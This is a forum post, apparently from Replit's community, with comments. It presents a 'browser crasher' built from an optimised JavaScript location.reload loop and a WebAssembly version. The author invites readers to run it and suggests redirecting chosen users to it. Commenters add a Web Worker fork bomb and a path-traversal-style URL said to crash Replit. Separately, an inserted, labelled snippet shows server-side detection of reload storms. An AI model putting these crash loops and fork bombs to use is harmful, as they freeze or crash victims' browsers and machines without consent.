Browser Crasher
xxpertHacker (930)

About a month ago, I had opened Chromium bug reports explaining this, informing them that a single page can crash a whole browser, but they... seem to have not really cared, so Chromium is okay with it, thus this cannot be considered illegal or malicious, as the developers don't care.


Update

As of today, September 9th, Chromium finally acknowledged this bug and successfully replicated it, meaning the bug should be fixed within the year.


Update #2

They don't care, they closed the report.


Looping location.reload quickly in JavaScript can lock up the browser.
But... many factors come into play:

  • Page size: large pages load slower, so they reload slower too; if the reload is too slow, the loop is completely ineffective, although still annoying.
  • Loading speed: related to the previous point, but there is more to loading than size; HTML is just slow to parse in general, especially poorly designed HTML.
  • Execution speed: There are a few micro-optimizations that can be applied to improve the performance of the loop.

So, how do you beat all 3?

CSS: A style-less page will load faster than one with style, so I cut it out.
Loading speed: Cut out everything unnecessary for a basic webpage to test the crash. HTML is slow to parse, so I used XHTML instead. Lastly, the page has no external data to fetch, it's all in one page.
Execution speed: There's much that can be done to improve speed here:

  • Simply opting into "strict mode" improves performance noticeably.

An example of what we could use:

for (;;) {
    location.reload();
}

This is straightforward and simple, but... it's not at its best. reload takes a boolean argument that determines whether to reload from the server or from the cache; true means it should load from the server.
Since we called location.reload each time, we kept doing a method lookup; binding directly to the function would be better.

const { reload } = location;

Unfortunately, reload lives on Location.prototype and needs the location object as its this, so it has to be bound. Put together:

"use strict";

// Bind once so the loop calls the function directly instead of looking it up each pass.
const reload = location.reload.bind(location, false);
// false -> load from cache; faster than an HTTP request to the server

for (;;) {
    reload();
}

Now, that is probably the best you can do in JavaScript... but JavaScript isn't the only option for usage on the web, and I know how to use the other one: https://en.wikipedia.org/wiki/Webassembly. Wasm loads faster than JavaScript, parses faster, and executes faster, so you know what I did.

(module
  (import "location" "reload" (func $reload))

  (func $_start
    loop
      call $reload
      br 0 ;; branch to the innermost enclosing block, i.e. the loop head,
           ;; so the loop repeats forever
    end
  )

  (start $_start) ;; execution begins here when the module is instantiated
)

What the attached Wasm looks like in JavaScript is essentially just this:

import { reload } from "location"; // the Wasm import, written as a JS module import

function _start() {
    for (;;) {
        reload();
    }
}

Very similar, yet what difference is there? It's faster in every way, that's it.

Now, why would you use this webpage? Maybe you want to redirect specific users from a specific URL on your server to it? ¯\_(ツ)_/¯

Go check the source, run the page, have fun!
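A defensive counterpart, added here and not part of the original post: the reload loop above re-requests its own URL on every pass, so a proxy or application can spot it in its access log and throttle the client rather than keep serving the loop. The log format, addresses, timestamps and thresholds below are constructed for the example.

```javascript
// Added example, not from the original post: server-side detection of a reload
// storm. A page looping location.reload() re-requests its own URL on every
// pass. Assumption: the reload revalidates the document with the server, so
// each pass is visible as a GET (normally answered 304). Counting hits per
// client and path in a sliding window lets a proxy or app throttle that client
// (for example with a 429) instead of feeding the loop.

// Constructed sample access log, not real traffic: "client ts_ms method path status".
function buildSampleLog() {
  const lines = [];
  // Looping client: 15 reloads of the same page, 40 ms apart (0.56 s total).
  for (let i = 0; i < 15; i++) {
    lines.push(`10.0.0.7 ${1600000000000 + i * 40} GET /crash.xhtml ${i ? 304 : 200}`);
  }
  // Ordinary client: three requests spread over several seconds.
  lines.push("10.0.0.9 1600000001000 GET /index.html 200");
  lines.push("10.0.0.9 1600000003000 GET /about.html 200");
  lines.push("10.0.0.9 1600000009000 GET /index.html 304");
  return lines;
}

function parseLine(line) {
  const m = /^(\S+) (\d+) (GET|HEAD|POST) (\S+) (\d{3})$/.exec(line.trim());
  if (!m) return null; // skip malformed lines rather than throwing
  return { client: m[1], ts: Number(m[2]), method: m[3], path: m[4], status: Number(m[5]) };
}

// Returns a Map "client path" -> peak number of hits seen inside any windowMs
// span, holding only keys that exceeded maxHits. Lines are assumed to be in
// time order, as a web server writes them.
function findReloadStorms(lines, { windowMs = 1000, maxHits = 10 } = {}) {
  const recent = new Map(); // key -> timestamps still inside the window
  const storms = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const key = `${rec.client} ${rec.path}`;
    const ts = recent.get(key) ?? [];
    ts.push(rec.ts);
    while (rec.ts - ts[0] > windowMs) ts.shift(); // drop hits older than the window
    recent.set(key, ts);
    if (ts.length > maxHits) storms.set(key, Math.max(storms.get(key) ?? 0, ts.length));
  }
  return storms;
}

console.log(findReloadStorms(buildSampleLog()));
```

Because the looping page requests the same path from the same client many times per second, it stands out even when every response is a cheap 304.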


Report this to your browser vendor

I have already opened a Chromium report regarding this bug myself.
If you are on another browser, ex: Firefox, Safari, Edge, Opera, and this works, please report it to them as appropriate.
This bug is very annoying, I have personally opened the page too many times while developing it, and it almost crashed my low RAM computer :)

Comments
Barry123 (350)

@xxpertHacker pretty impressive, but

How do you un-crash the browser?!

xxpertHacker (930)

@Barry123 Oh, umm... now that's for another day. :)

Barry123 (350)

Yay now I fixed it :D

LD1 (53)

Doesn't appear to work on safari, but it works on Chrome, Chromium, and Brave

xxpertHacker (930)

@LD1 Ooh, you use Brave too? That's the browser I developed this on!
Safari doesn't support JavaScript modules on XHTML pages, that should be reported.

programmeruser (596)

You don't need to exploit a bug, you can just fork bomb with web workers:

while (true) {
  const worker = new Worker('script.js');
}

It makes your RAM usage skyrocket to 97%.
Demo: https://web-worker-fork-bomb.programmeruser.repl.co
Also, there's a related bug report on Firefox's Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=537527.

xxpertHacker (930)

@programmeruser What? That won't work in FF, FF has a worker cap of 20.

Btw, CSS is more dangerous than JS or Wasm. :)

programmeruser (596)

@xxpertHacker but it will on chrome, I think it uses one process for each web worker. https://gofile.io/d/HiuUnY

Btw, CSS is more dangerous than JS or Wasm. :)

Why?

xxpertHacker (930)

@programmeruser On FF, it's just a memory problem with allocating a bunch of Worker objects and associated JSRuntimes, on Chrome I expect an actual fork bomb.

Oh, in that case, when Wasm gets access to threads, fork bombing will be fun!

I'll make a whole new post, not unlike the current one that we're on, but using CSS, and link you to it.

programmeruser (596)

@xxpertHacker I think I found a claim code that crashes Replit; could you test it so that I can make sure that it isn't just a problem on my side?
https://replit.com/claim?code=../../../../hi/there
Make sure to wait a bit, then try resizing the window or clicking a button in the sidebar.

xxpertHacker (930)

@programmeruser Nope, no effect on mobile Firefox. Tried desktop site too on mobile browser.

adsarebbbad (216)

virtual machine go brrr

xxpertHacker (930)

@adsarebbbad mhm, sure made my browser's VM go "brrrrrrrrrrrrrrrr"

CodeLongAndPros (1622)

@Jasperscode Hello, I'm the admin. First of all, no cursing. I'm removing it, but next time it's a warning. Second, this repl falls within ToS and therefore is allowed. Anything else you'd like to say?

xxpertHacker (930)

@CodeLongAndPros Honestly, when I first talked about trying to post this, I thought that it would've been removed by the moderators, but then I laughed when I saw a mod upvote it.

Also, @Jasperscode this isn't even malicious. You need to see other Repl types; they force the web page to open here, so you would've already been attacked. At least you have to actually open the HTML Repls.

Jasperscode (14)

@CodeLongAndPros it nearly destroyed my computer idiots!# ban this

CodeLongAndPros (1622)

@Jasperscode Please tell me how. What did you do. I dare say you were warned well. And you tried it. This is your problem.
I'll take this down if and only if it caused actual damage to your hardware.

Jasperscode (14)

@CodeLongAndPros I had to replace my CPU, GPU, and motherboard.

xxpertHacker (930)

@Jasperscode Lmao, I'm sure that you did.

@CodeLongAndPros You know what... I had asked a moderator on the Discord before posting this, in fact, I think I had specifically asked you.

CodeLongAndPros (1622)

@xxpertHacker I don't recall. I was still new back then, I probably just asked H.

CodeLongAndPros (1622)

@Jasperscode Proof? Esp. since a while true can't break the GPU.
Actually, no. I'm not going to take this post down. You can either suck it up and reboot your computer, or get warned for spam. Your move.

xxpertHacker (930)

@CodeLongAndPros I barely remembered that I had asked, but I doubted that you would've remembered either, it was some time ago.

@Jasperscode This shouldn't have affected GPU usage at all :/
Any good CPU ought to be able to handle this.

Lastly, I've used an old Windows 7 and it nearly crashed the PC, but the hardware was perfectly fine.

CodeLongAndPros (1622)

@xxpertHacker (also it's broken on Firefox for iOS)

xxpertHacker (930)

@CodeLongAndPros Oh, I know, I tested iOS and mobile, completely ineffective. Great on desktop Chromium though!

It's likely because it's not an HTML document executing the code.

You know what, I need to go report that...

DungeonMaster00 (190)

for some reason this didn't crash firefox on ubuntu but i closed a window and it was still running so i had to restart my pc

xxpertHacker (930)

@DungeonMaster00 Oh, you're lucky, it crashed quite a few other people, including myself (more than once).

Some browsers it won't work on at all (eg: Safari), and practically all mobile browsers, since they simply don't support running that webpage properly.

Also, why didn't you try using a task manager or something similar, if you hadn't crashed?

DungeonMaster00 (190)

@xxpertHacker didn't think of it

also i recommend ubuntu because it is basically an easy-to-use linux distribution

xxpertHacker (930)

@DungeonMaster00 Hmm... I'll pass, but at least we agree that we would prefer to use Linux, is that good enough?

LD1 (53)

I wouldn't recommend trying this on Firefox on Mac. I tried it, and now I can't get it unfrozen (deleting and reinstalling, rebooting). Nothing seems to work. Good thing is that I don't use firefox.

xxpertHacker (930)

@LD1 RIP, that sounds bad, you might want to try to report that for us.

LD1 (53)

@xxpertHacker Yes, I got it to work again and reported it. Seems like it just takes time for firefox to unfreeze, rebooting and reinstalling for whatever reason didn't work (at least not for me)

Leroy01010 (409)

i found out how to uncrash the browser

CodingRobot12 (182)

This seems cool but based on the other people's comments I am not going to run it lol

xxpertHacker (930)

@CodingRobot12 But, read the bottom of the post, you gotta run it lol.

johndo3 (21)

you destroyed my windows XP computer you owe me $10 jk

[deleted]

It froze my Chromebook for about 5 to 10 minutes! I had to shut it down for it to work again!

Leroy01010 (409)

I KNOW HOW TO UNCRASH THE BROWSER

SixBeeps (5223)

thus this cannot be considered illegal or malicious, as the developers don't care.

Ah yes, so I presume finding a security flaw in Windows and making a virus that exploits it is perfectly fine then?

Jokes aside, this is a nice find. It's incredible that this hasn't been patched yet, as it seems way too simple of a bug to use.

xxpertHacker (930)

@SixBeeps This is honestly the simplest bug I've spotted in a browser to date; I've seen people carefully thinking things out, doing some weird complicated stuff, carefully timing everything, etc, but this... it's effortless and surprisingly powerful, but it doesn't do too much, I can't steal your data or something.
But yeah I seriously did report it and they don't seem to care, someone might want to test if it affects Firefox, Safari, etc, and report it to them as appropriate.

RohilPatel (1581)

You know I like running:

location.href = "/haha";

on a server

xxpertHacker (930)

@RohilPatel Haha, maybe send your banned users here lol.

xxpertHacker (930)

@RohilPatel It's all right, all of my servers will redirect you here too :)